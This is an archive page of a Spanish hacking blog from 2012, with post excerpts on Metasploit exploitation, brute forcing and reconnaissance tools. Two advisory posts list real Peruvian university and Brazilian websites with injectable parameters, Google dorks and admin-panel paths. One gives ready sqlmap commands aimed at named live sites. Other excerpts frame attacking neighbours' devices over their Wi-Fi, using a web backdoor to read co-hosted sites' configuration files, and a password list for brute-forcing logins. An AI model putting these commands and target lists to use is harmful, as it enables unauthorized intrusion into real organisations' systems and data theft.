lunes, 31 de diciembre de 2012

¡Feliz Año Nuevo para todos mis fieles lectores!




Que el 2013 este lleno de amor, paz, felicidad, salud, trabajo, buena música buenos amigos, esperanza y fe.

Feliz Año Nuevo a todos.

jueves, 20 de diciembre de 2012

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)



------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------

lunes, 17 de diciembre de 2012

Peruvian Universities - MS Access/SQL Injection Vulnerabilities



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title : Peruvian Universities - MS Access/SQL Injection Vulnerabilities
# Date : 16-12-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Contact       : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Category : WebApps
# Google Dork : ".php?id= site:edu.pe" or ".asp?id= site:edu.pe"
# Tested on:    : BackTrack 5 R3
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ANALIZING:

# http://www.site-web.edu.pe/[PATH].php?id='     [SQL Injection]
# http://www.site-web.edu.pe/[PATH].asp?id='     [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] DETECTING VULNERABILITY:

# You have an error in your SQL syntax;             [SQL Injection]
# Microsoft OLE DB Provider for SQL Server error '80040e14'  [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] VULNERABLE FILES:

# noticias.php? detalle.asp? index.php? interno.php?
# informacion.php? egresados.php? contacto.php? encuesta.asp?
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXAMPLE SITES VULNERABLE:

# http://www.uap.edu.pe/convenios/detalle.asp?cod=1'
# http://www.umch.edu.pe/interno.php?id=46'
# http://www.utp.edu.pe/noticias.aspx?idNoti=1'
# http://www.ipp.edu.pe/listado.php?cat=1'
# http://www.udch.edu.pe/web/egresados.php?e=1'
# http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327'
# http://www1.up.edu.pe/servicios/sitios/contacto.php?id=3'
# http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1'
# http://envivo.universia.edu.pe/detalle_empleo.php?id=8608'
# http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915'
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXPLOITING SITES VULNERABLE WITH SQLMAP:

# ./sqlmap.py -u http://www.uap.edu.pe/convenios/detalle.asp?cod=1 --dbs
# ./sqlmap.py -u http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327 --dbs
# ./sqlmap.py -u "http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1" -p "pregunta" --dbs
# ./sqlmap.py -u "http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915" -p "pID" --dbs
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] SCREENSHOT:

# http://img213.imageshack.us/img213/269/inject.png
# http://img109.imageshack.us/img109/8761/inject2.png
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ACCESS INTRANET - LOGIN:

# http://www.site-web.edu.pe/intranet/
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

More Info: http://packetstormsecurity.org/files/118888/Peruvian-Universities-SQL-Injection.html

Nessus y su Interfaz Gráfica en HTML5




Desde mucho tiempo la interfaz de Nessus ha estado usando Flash, que tiene una serie de ventajas como una plataforma de desarrollo, pero también tiene una gran cantidad de inconvenientes. Una de las razones que la Tenable Network ha implementado una interfaz de Flash para Nessus era que Flash "se comporta igual en todos los navegadores" (que resulta que no siempre es el caso), y era bastante rápido para ejecutar el cliente. Pero desde hace poco la Tenable Nework ha optado por utilizar una tecnología basada en estándares, y se ha movido hacia HTML5.

Para ello se ha lanzado la interfaz de HTML5 en versión beta, pero la interfaz por defecto de Nessus seguirá siendo flash por ahora, pero si nos conectamos al escanner utilizando un navegador que no tiene Flash instalado, o si vamos directamente a la URL correcta, tenemos la opción de utilizar la versión beta del cliente de HTML5.

jueves, 13 de diciembre de 2012

[Arachni Framework] Una forma diferente de Escanear y Auditar Servidores Web




En términos muy simples, Arachni es una herramienta que permite evaluar la seguridad de las aplicaciones web. En términos menos simples, Arachni es una herramienta modular Open Source de alto rendimiento.

Es un sistema que comenzó como un ejercicio educativo y como medio para realizar pruebas de seguridad específicas en contra de una aplicación web con el fin de identificar, clasificar y registrar los temas de interés de seguridad.

Ahora se ha convertido en una infraestructura fiable que puede realizar cualquier tipo de auditorias en aplicaciones web relacionada con la seguridad y el raspado de datos generales.

[Metasploit] Atacando Windows mediante FreeFloat FTP Server Arbitrary File Upload




------------------------------------------------------------------------------------------------------------------
FreeFloat FTP Server es, como su nombre indica, una aplicación que nos permite compartir archivos y carpetas en la red. Toda la partición donde se inicia la utilidad es compartida por defecto. No se requiere la autenticación de usuario y el puerto predeterminado se puede cambiar, según nuestras necesidades.
------------------------------------------------------------------------------------------------------------------

Este Software actualmente ha sido vulnerado y permite a cualquier atacante penetrar cualquier Sistema Operativo Windows XP o 7 que tenga instalado y ejecutando dicho programa.

El modulo que se integro en Metasploit para explotar esta vulnerabilidad se aprovecha de diversos problemas en FreeFloat las cuales son:

  • No integra credenciales que se necesitan realmente para ingresar.
  • La ruta de los usuarios por defecto se encuentra en C:\ y esto no se puede cambiar.
  • El usuario puede escribir en cualquier parte del sistema de archivos del servidor.

Como resultado de estas implementaciones pobres, un usuario malintencionado puede simplemente entrar y luego cargar cualquier tipo de archivos.

Para explotar esta vulnerabilidad desde el Metasploit, los pasos son los siguientes:

miércoles, 12 de diciembre de 2012

Espiando a nuestros Vecinos y Hackeandole el Sistema mediante Subterfuge


Anteriormente había realizado un post donde muestro el funcionamiento de Subterfuge - Attack Framework, una herramienta para realizar Main in the Middle Attack y poder coger toda la información sobre las computadores conectadas en nuestra red.

Esta vez mostrare unos pequeños pasos sobre como obtener información confidencial y explotar totalmente el Sistema Operativo de las Computadoras, Iphone y Tablets conectadas en nuestra red, ya que hoy en día la mayoría de personas son tan amables que nos brindan su Wifi totalmente gratis, sin saber que nosotros podemos llegar a penetrar su sistema con tan solo enviarle unos simples exploits gracias a Subterfuge.

En la suite de BackTrack 5 r3 esta herramienta se integra por default y se puede utilizar con tan solo teclear subterfuge en la consola y luego abrir el localhost (127.0.0.1) desde nuestro navegador para apreciar la interfaz gráfica con todas las opciones para llevar a cabo nuestro ataque hacia las personas que estén conectadas en la misma red Wifi que nosotros.

martes, 11 de diciembre de 2012

Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)




Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: Google, Facebook, Mozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas. 


Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.

sábado, 1 de diciembre de 2012

Exploiting Windows 8 - 7 with BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability




BlazeVideo HDTV Player es una completa herramienta de reproducción de vídeo que permite no sólo disfrutar de nuestras películas favoritas en DVD, sino también sintonizar televisión de alta definición a través de la tarjeta sintonizadora de TV. El programa esta disponible para Windows 8 - 7 y es usado por muchos usuarios que se dedican al mundo de la multimedia en Internet ya que cuenta con una elegante interfaz personalizable mediante skins, muy intuitiva y de sencillo manejo. 

Como todo buen programa, los investigadores de seguridad siempre se toman un poco de tiempo para realizarle un análisis de seguridad con el fin de conseguir un agujero que nos permita vulnerar el programa y aprovecharnos del sistema operativo en la cual se encuentra instalado.

Tal es el caso, que el día 30 de Noviembre, se reporto una vulnerabilidad en dicho programa denominado BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability, la cual  como es de costumbre y conocimiento, inmediatamente se integro en los módulos de Metasploit 

El módulo se aprovecha de una vulnerabilidad encontrada en la rutina de manejo de BlazeVideo HDTV Player. Al suministrar una serie de datos de entrada incrustado en un archivo .plf, el componente MediaPlayerCtrl.dll intentará extraer un nombre de archivo usando PathFindFileNameA(), y luego copia lo que el valor de retorno está en la pila mediante el uso de inline strcpy. Como resultado, si los datos de entrada es lo suficientemente largo, puede causar un desbordamiento del búfer basado en la pila, lo que puede provocar la ejecución de código arbitrario en el contexto del usuario.

martes, 27 de noviembre de 2012

[PAPER] Penetration Testing with BackTrack



INTRODUCCIÓN

MÉTODOS DE ANÁLISIS DE APLICACIONES WEB

Network Mapping
Information Gathering
CMS Identification
IDS/IPS Detection
Open Source Analysis
Web Crawlers
Vulnerability Assessment and Exploitation
Maintaining Access

NETWORK MAPPING

Nmap
Netifera

INFORMATION GATHERING

TheHarvester
Maltego

CMS IDENTIFICATION

BlindElephant
CMS-Explorer
WhatWeb

IDS/IPS DETECTION

Waffit

OPEN SOURCE ANALYSIS

GHDB (Google Hacking DataBase)
Xssed

WEB CRAWLERS

WebShag
DirBuster

VULNERABILITY ASSESSMENT AND EXPLOITATION

JoomScan
SqlMap
Fimap
Shodan
W3af
Uniscan
Nikto

MAINTAINING ACCESS

Weevely
WeBaCoo
MsfPayload

CONCLUSIÓN

DOWNLOAD

VER ONLINE

martes, 20 de noviembre de 2012

[xHydra] BruteForcing FTP - Website - Router con 14 Millones de Password




INTRODUCCIÓN:

Según OWASP el Brute Forcing consiste en enumerar sistemáticamente todos los posibles candidatos para la solución y comprobar si cada candidato satisface la declaración del problema. En las pruebas de penetración hacia aplicaciones web, el problema al que nos vamos a enfrentar con la mayor parte es muy a menudo con la necesidad de tener una cuenta de usuario válida para acceder a la parte interna de la aplicación.

Pero para realizar un BruteForcing seguro y rapido, siempre es necesario contar con una buena lista de contraseñas para que el trabajo sea mas eficiente, para tal caso y pensando en ustedes voy a compartir una lista de 14 millones de Password's para el respectivo crackeo de Password's ya sea en Servidores Web's, Servicios FTP, SSH y Router's, que pueden ser usados con el John The Riper, Hydra u otras herramientas que se utilizan para el BruteForcing en cualquier sistema operativo.

martes, 13 de noviembre de 2012

[CVE-2012-5076] Explotando Java Applet JAX-WS Remote Code Execution



Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.

El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.

El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.

Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

sábado, 10 de noviembre de 2012

[Armitage - Metasploit] Introduccion - Information Gathering - Exploitation - Post Exploitation



INTRODUCCIÓN:

Todas las personas que se dedican al Pen-test o son activos en el campo de la Seguridad Informática tienen conocimiento sobre lo que es Metasploit y el trabajo que realiza, sin embargo el aprendizaje inicial para Metasploit puede ser intimidante para los 'novatos' que estén interesados en realizar pruebas de penetración, pero mayormente no tienen idea por donde empezar.

Armitage es una representación gráfica avanzada de Metasploit Framework, sus principales características son de mapear cada etapa de la Prueba de Penetración, la Recopilación de Información, Explotación y Post Explotacion, con unos pocos clics.

Armitage se encuentra disponible en todas las versiones del BackTrack, y puede ser instalado en cualquier distro de linux sin problema alguno.

martes, 6 de noviembre de 2012

MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities




###############################################################################################################
# Exploit Title : MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities
# Date : 06-11-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Contact : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Vendor       : MD Webmarketing
# URL Vendor : http://mdwebmarketing.com.br/
# Category : WebApps
# Dork : "Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
# Tested on: : BackTrack 5 R3
###############################################################################################################


###############################################################################################################

[~] Exploit:

http://www.site-web.com/***.php?id=                 [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

###############################################################################################################

[~] Example Sites SQL Injection:

http://www.acontecenews.com.br/exibe.php?id=65637'
http://www.revistapenseleve.com.br/exibe.php?id=1331'
http://itaporaagora.com.br/exibe.php?id=133050'
http://www.pierreadrileiloes.com.br/exibe.php?id=61712'
http://www.viaruralagro.com.br/loja/detalhes.php?id=24'

###############################################################################################################

[~] Example Sites Cross Site Scripting:

http://www.acontecenews.com.br/exibe.php?id=62587&cod_editorial=&url=index.php&pag=&busca="<h2>TEST</h2>
http://www.itaporaagora.com.br/exibe.php?id=132094&cod_editorial=&url=exibe.php&pag=&busca="<h2>TEST</h2>
http://www.deodapolisagora.com.br/exibe.php?id=131746&cod_editorial=&url=&pag=&busca="<h2>TEST</h2>

###############################################################################################################

[~] Screenshot:

http://imageshack.us/a/img443/2181/testwwh.png     [SQL Injection]
http://imageshack.us/a/img687/7656/test2sc.png    [Cross Site Scripting]

###############################################################################################################

[~] Location Panel Administrative:

http://www.site-web.com/adm
http://www.site-web.com/admin

###############################################################################################################

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

###############################################################################################################

More Info: http://packetstormsecurity.org/files/117927/MD-Webmarketing-Cross-Site-Scripting-SQL-Injection.html

DNS Network Mapper




Dnsmap es un mapeador de red (Network Mapper), normalmente se conoce como Brute Force para Subdominios, originalmente publicado en 2006, utilizado por pentesters durante la recopilación de información/enumeración en la fase de evaluación de la seguridad de la infraestructura (objetivo). 


Dnsmap es una herramienta programada en Python de código abierto y probado en el sistema operativo basado en Linux aunque puede usarse en FreeBSD y Windows mediante el uso de Cygwin, dnsmap actualmente esta incluido en BackTrack 5 R3.

martes, 30 de octubre de 2012

Explotando Windows 8 desde Metasploit




Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.

Segun Yo: La seguridad que ofrece Microsoft en esta nueva version de Windows, es la misma que se obtiene al instalar Windows 7, esto se debe a que efectivamente solo ha cambiado la interfaz grafica y ha añadido nuevos programas que lo hace mas vulnerable, simplemente por ser una version parecida a los que usan los Telefonos Moviles. La actualizacion automatica que brinda, solo sirve para actualizar el Internet Explorer y los servicios (Redes Sociales - Correo y Multimedia). El Windows Defender que se integra por default, no detecta las URL maliciosas (Exploits Kit's) ni mucho menos cuando se intenta descargar algun archivo ejecutable, solamente se pronuncia el aviso que brindan los navegadores "Desea descargar este Archivo (Permitir - Rechazar)" que es lo unico que al menos nos alerta de un supuesto Malware, por lo que simplemente Windows 8 seria el WINDOWS XP 2012.

domingo, 28 de octubre de 2012

Vulnerando Windows 7-XP (IE 0-day) usando Browser Autopwn desde Metasploit



En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn incluida en el Metasploit, la cual nos permitirá explotar cualquier tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo asi una session meterpreter en el sistema vulnerable.

Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la versión del browser que la victima este utilizando, por ejemplo cuando utilizemos el modulo browser_autopwn esta buscara todos los exploits respectivos para cualquier tipo de navegador, ya sea Internet Explorer, Google Chorme, Firefox u Opera, de manera que cuando la victima ejecute el link generado, esta automaticamente se aproveche de la vulnerabilidad encontrada.

Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos basaremos en la ultima vulnerabilidad 0-day que se registro en el Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite que cualquier 'atacante' puede utilizar el exploit respectivo para tomar acceso completo al sistema.

viernes, 26 de octubre de 2012

Hacking Windows 7 - XP desde Metasploit mediante Microsoft XML Core Services Vulnerability



En este entrada se describirá como explotar un Sistema Windows, ya sea XP o 7, mediante la vulnerabilidad MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption desde el Metasploit de una forma rápida y divertida como acostumbramos a hacerlo.

Esta vulnerabilidad se aprovecha de un fallo en la memoria de Microsoft XML Core Services al intentar acceder a un nodo sin inicializar con la API getDefinition, por lo que puede dañar la memoria, permitiendo la ejecución remota de código.

jueves, 25 de octubre de 2012

Explotando Windows 7 - XP mediante PDF Escape desde Metasploit




En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc. 

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".


viernes, 19 de octubre de 2012

[Penetration Testing - Hacking Etico] Análisis Web - Evaluación de Vulnerabilidades - Explotacion




INTRODUCCIÓN:

Hoy en día como muchos de nosotros tenemos conocimiento que en estos tiempos el Análisis de Aplicaciones Web juega un papel muy importante al hacer una Evaluación de la Seguridad y/o Penetration Testing, ya que esta nos brinda la información adecuada acerca de la aplicación web, como por ejemplo el tipo de Plugin que utiliza, tipos de CMS ya sea Joomla - WordPress u otros.

Esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades que se pueden presentar al momento de realizar las pruebas de penetración.

Para ello usaremos como es de costumbre en este Blog, BackTrack 5 R3, una distro de Linux basada en Ubuntu hecha perfectamente para llevar a cabo estas pruebas, ya que viene con un conjunto de herramientas muy importantes que servirá de mucho para obtener toda la información necesaria.

jueves, 18 de octubre de 2012

Explotando SQL Injection 0-day en Foros MyBB

Hace unos días PonyBlaze descubrió una Vulnerabilidad de SQL Injection en los servidores webs basados en MyBB versiones 1.5 en el Plugin Follower User.

La descripción de dicha Vulnerabilidad se puede apreciar desde el siguiente link: 


miércoles, 17 de octubre de 2012

Symlinking manualmente desde Weevely Web BackDoor




INTRODUCCIÓN:

En esta entrada se realizara un breve tutorial en la cual explicare como realizar Symlink manual en un servidor web a través de Weevely, la cual nos permitirá obtener los datos de configuración de algunas webs hospedadas en el mismo servidor, ya sea Joomla - WordPress vBulletin - SMF - MyBB - Drupal - Php Nuke - Oscommerce - IPB, Seditio u otros.

Este método puede ser el plan B cuando no encontremos el respectivo Local Root Exploit para el kernel que lleva el servidor objetivo.

Algunas personas optan realizar este método cuando la web objetivo no tiene ninguna vulnerabilidad que les permita entrar a la misma, por lo que recurren a buscar webs vulnerables hospedada en el mismo servidor.

También se detallara como crear el respectivo BackDoor desde Weveely la cual sera útil para obtener la conexión entre el servidor y nuestro ordenador, como también los respectivos pasos para obtener los archivos de configuración de los sitios webs hospedado en el mismo servidor (victima).

martes, 16 de octubre de 2012

SQL Injection desde BurpSuite con SQLmap Burp Plugin





INTRODUCCIÓN:

Burp Suite es una herramienta que nos permite realizar pruebas de seguridad en las aplicaciones web. Sus diversas herramientas funcionan perfectamente la cual apoya mucho en el proceso de prueba de penetración  a partir de la cartografía y el análisis inicial de la superficie de ataque de una aplicación, hasta la búsqueda y explotación de las vulnerabilidades.

Muchas veces cuando se realiza auditoria a un sitio web, siempre es recomendable colocar un proxy intermedio para saber y tener el control total de las peticiones enviadas y recibidas, para ello se debe utilizar Burp Suite.

También es de conocimiento que en estas auditorias, la vulnerabilidad mas conocida que se puede presentar es la SQL Injection.

Para tal caso, en esta entrada presentare un Plugin totalmente gratuito desarrollado por ggdaniel que nos servirá para usar el SQLmap desde el Burp Suite de una forma fácil y eficaz.


sábado, 13 de octubre de 2012

Exploiting MS Access Sql Injection





INTRODUCCIÓN:

En esta entrada se describirá cómo aprovechar las vulnerabilidades de SQL Injection cuando la base de datos back-end es MS Access. Mayormente esta vulnerabilidad se puede encontrar en los servidores programados en .asp 

Access se conoce como un sistema de base de datos de escritorio, ya que las funciones están destinadas a ser ejecutado desde un único equipo. Esto está en contraste con una aplicación de base de datos de servidor (por ejemplo, SQL Server), que está destinado a ser instalado en un servidor.

Aunque las aplicaciones web creadas por Microsoft Access no son muy populares hoy en día  todavía es posible encontrar algunas webs vulnerable a este ataque.

viernes, 12 de octubre de 2012

Web Application Penetration Testing con Google Chrome

Pequeña lista de extensiones interesantes y útiles que pueden ayudar a muchos de nosotros cuando estemos haciendo una prueba de penetración.


miércoles, 10 de octubre de 2012

[Actualización] CAINE 3.0 - Computer Forensics Linux Distro




INTRODUCCIÓN:

CAINE (Computer Aided INvestigative Environment), es una distribución GNU/Linux en modo LiveCD creada por Giancarlo Giustini como un proyecto de Informática Forense (Forense Digital) para el Centro de Investigación en Seguridad (CRIS), con el apoyo de la Universidad de Modena y Reggio Emilia

El proyecto CAINE (Computer Aided INvestigative Environment) no pretende ser una nueva herramienta forense o framework de recopilación de ellas, pues este tipo de distribuciones ya existen (ej. Felix FCCU, Deft, entre otras). CAINE propone como novedad un nuevo entorno de fácil uso para todo este tipo de herramientas. Además introduce nuevas características importantes, que aspiran a llenar el vacio de interoperabilidad a través de diferentes herramientas forenses, ya que proporciona una interfaz gráfica homogénea que guía a los investigadores digitales durante la adquisición y el análisis de las pruebas electrónicas, y ofrece un proceso semi-automático durante la documentación y generación de informes y resultados.

miércoles, 3 de octubre de 2012

[ReverseRaider] Enumeración de Dominios y Sub-dominios




INTRODUCCIÓN:

La enumeración de DNS inversa en una IP o un conjunto de IP a veces puede revelar información que antes no se tenía. Puede ser dirigida a un servidor web que tiene un montón de máquinas virtuales y se prefiere rastrear el sitio web principal en el servidor web que es donde reverseraider puede proporcionar los resultados necesarios, ya que es más probable que el sitio más importante de la servidor web virtual tiene configurado DNS inverso en el mismo host. 

martes, 2 de octubre de 2012

dSploit – Suite de Pen-testing en Android





INTRODUCCIÓN:

Simone Margaritelli (alias Evilsocket) recientemente público dSploit, un nuevo proyecto dedicado al mundo Android con la capacidad de realizar análisis y pruebas de penetraciones de red que llevan a un dispositivo móvil y a un profesional avanzado realizar una evaluación de la seguridad de IT.

Una vez que la aplicación se inicia, el usuario será capaz de mapear su red, identificar los sistemas operativos y servicios que se ejecutan en otros parámetros, realizar búsqueda de vulnerabilidades conocidas, descifrar los procedimientos de acceso de los métodos más comunes de autenticación, realizar ataques man in the middle y por lo tanto tiene el control total del tráfico de red, tanto pasiva con un sniffer contraseña y disector de los protocolos más comunes que la manipulación activa de paquetes en tiempo real desde y hacia otras máquinas en nuestro propia red, etc.

viernes, 28 de septiembre de 2012

Information Gathering mediante el uso de MALTEGO





INTRODUCCIÓN:

La primera fase de evaluación de la seguridad es centrarse en la recopilación de información tanto como sea posible acerca de una aplicación web. De acuerdo con OWASP, la recopilación de información es un paso necesario en lo que respecta las pruebas de penetración.

Hay básicamente dos tipos de recolección de información: activa y pasiva. Recopilación de información pasiva es que los atacantes no se comunicarán con el objetivo directamente y estarán tratando de reunir información que está disponible en la Internet, mientras que en la recolección activa de información, el atacante estará en contacto directo con el objetivo y estará tratando de reunir información.


jueves, 27 de septiembre de 2012

[Fierce] DNS Bruteforcing and Information Gathering




Las transferencias de zona DNS no funciona todo el tiempo, de hecho, no funciona la mayor parte del tiempo. La mayoría de los servidores DNS están configurados correctamente y no permiten transferencias de zona a cada cliente. Bueno, ¿qué hacemos entonces? Respuesta simple, lo mismo que hacemos cuando nada funciona, la Fuerza Bruta, para tal caso usaremos Fierce, una herramienta incluida en la suite de BackTrack, la cual es muy útil cuando necesitamos obtener IP'S - DNS' de servidores web.

lunes, 24 de septiembre de 2012

Enumeración de Email e Informacion con JIGSAW



Jigsaw es una herramienta basada en Ruby que nos permite enumerar la informacion (E-mail, Direccion, Nombre y Apellidos y Cargos) de las personas que laboran en una empresa ya sea en Facebook, Google, Microsoft u otros.

Mayormente esta informacion puede servir para realizar Ing. Social o E-mail Pishing. 


sábado, 22 de septiembre de 2012

Actualización: Web-Sorrow v-1.4.6 Herramienta de Pen-testing


Web-Sorrow es una herramienta basada en perl que se utiliza para detectar una mala configuración, detección de versión, enumeración y análisis de información de un servidor web.

Esta herramienta no esta diseñada para explotar cualquier tipo de vulnerabilidad ya sea DDoS/DoS, CSRF, XSS o algunos otros ataques que pueden dañar un servidor web, mayormente Web-Sorrow se empeña en la enumeración y recoge información sobre un servidor especificado.

lunes, 17 de septiembre de 2012

Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7




Un investigador de seguridad ha encontrado una nueva Vulnerabilidad 0day que afecta a Internet Explorer, mientras se realizaba un análisis de una página de malware que se estaba utilizando para explotar las vulnerabilidades de Java.

Según el equipo de Metasploit, el Internet Explorer 7, 8 y 9 en Windows XP, Vista y 7 son vulnerables a este ataque.

Eric Romang ha descubierto una carpeta "/public/help" en uno de los servidores infectados. Él encontró un archivo flash (.Swf), dos paginas html (protect.html, exploit.html) y el archivo exe.


sábado, 15 de septiembre de 2012

OS Fingerprinting con Xprobe2




INFORMACIÓN:

El OS Fingerprinting es una técnica que consiste en analizar las huellas que deja un sistema operativo en sus conexiones de red. Está basada en los tiempos de respuesta a los diferentes paquetes, al establecer una conexión en el protocolo TCP/IP, que utilizan los diferentes sistemas operativo.

Los programas que se utilizan para realizar OS Fingerprinting se basan en dos filosofías, escáner pasivo o activo: 

En un escáner activo la herramienta envía paquetes esperando una respuesta del sistema operativo y la compara con su base de datos. Suele usar técnicas como: inundación de paquetes SYN, envió de flags TCP incorrectos, envió de paquetes FIN… Estas técnicas son fáciles de detectar.


jueves, 13 de septiembre de 2012

[Blender] Animacion y Creacion de Graficos 3D desde BackTrack



Blender es un programa informático multiplataforma programado en C, C++ y Python, dedicado especialmente al modelado, animación y creación de gráficos tridimensionales.

El programa fue inicialmente distribuido de forma gratuita pero sin el código fuente, con un manual disponible para la venta, aunque posteriormente pasó a ser software libre. Actualmente es compatible con todas las versiones de Windows, Mac OS X, Linux, Solaris, FreeBSD e IRIX.

Tiene una muy peculiar interfaz gráfica de usuario, que es criticada como poco intuitiva, pues no se basa en el sistema clásico de ventanas; pero tiene a su vez ventajas importantes sobre éstas, como la configuración personalizada de la distribución de los menús y vistas de cámara.

miércoles, 12 de septiembre de 2012

Apple presenta el iPhone 5



Phil Schiller se ha subido al escenario en el Yerba Buena Center of San Francisco para presentar el nuevo iPhone 5, confirmándose este nombre sobre todo los rumores que apuntaban que iba lleva la misma nomenclatura que el nuevo iPad. Cuenta con el mismo diseño que hemos podido ver en todos las filtraciones con un pantalla más alargada y la construcción de aluminio unibody. Cuenta con 7,6mm de grosor, 18% menos de grosor y un 20% mas ligero con 12 gramos. La pantalla es de 4 pulgadas de 1136x640 y una densidad 326 píxeles por pulgada.

martes, 11 de septiembre de 2012

Lanzamiento de Pentoo 2012.0 Beta2

Pentoo 2012.0 Beta 2 llega con una configuración fortalecida por defecto y ahora está disponible para su descarga desde torrent. 

Pentoo es una distribución Linux en Live-CD basada en Gentoo diseñada para pruebas de penetración y seguridad. Puede arrancar el sistema tanto en CD como en memoria USB y está optimizada para el procesador Pentium III.

Se trata básicamente de una instalación de Gentoo con un montón de herramientas personalizadas, kernel personalizado, y mucho más.

Aquí está una lista no exhaustiva de las características que figuran actualmente:


lunes, 10 de septiembre de 2012

